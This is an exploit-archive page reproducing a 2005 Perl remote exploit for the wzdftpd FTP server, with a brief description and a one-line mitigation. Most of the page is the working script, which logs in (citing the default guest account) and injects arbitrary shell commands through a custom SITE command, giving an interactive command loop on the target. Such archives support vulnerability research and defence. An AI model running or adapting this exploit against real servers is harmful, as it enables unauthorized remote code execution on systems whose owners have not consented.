header-logo
Suggest Exploit
vendor:
N/A
by:
kcope
7.5
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

wzdftpd remote exploit by kcope

This exploit allows an attacker to execute arbitrary code on a vulnerable system by using the Net::FTP module to connect to the FTP server and then using the site command to execute a custom command. The exploit is written in Perl and requires the attacker to provide the host, port, username, password, and custom site command as arguments.

Mitigation:

Ensure that the FTP server is configured securely and that the user accounts are configured with strong passwords.
Source

Exploit-DB raw data:

######################################################
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom 
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
#                    .___ _____  __             .___
#__  _  __________ __| _// ____\/  |_______   __| _/
#\ \/ \/ /\___   // __ |\   __\\   __\____ \ / __ | 
# \     /  /    // /_/ | |  |   |  | |  |_> > /_/ | 
#  \/\_/  /_____ \____ | |__|   |__| |   __/\____ | 
#               \/    \/             |__|        \/ 
#                                      
#__  _  _______ _______   ____ ________
#\ \/ \/ /\__  \\_  __ \_/ __ \\___   /
# \     /  / __ \|  | \/\  ___/ /    / 
#  \/\_/  (____  /__|    \___  >_____ \
#              \/            \/      \/ VER1
######################################################

use Net::FTP;

sub usage {
	print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
	     ."default guest account for wzdftpd is username/password: guest/%\n";
}

print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!

";

if ($#ARGV < 4) {
	usage();
	exit();	 
}

$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];

$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
     or die "Cannot connect to $host: $@";

$ftp->login($user, $pass)
     or die "Cannot login ", $ftp->message;
     
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
	print "!\$%&#>";
	$cmd=<stdin>;
	$ftp->site($sitecmd, "|$cmd;");
	print $ftp->message();
}

# milw0rm.com [2005-09-24]

Navigation

Suggest Exploit

Services By CQR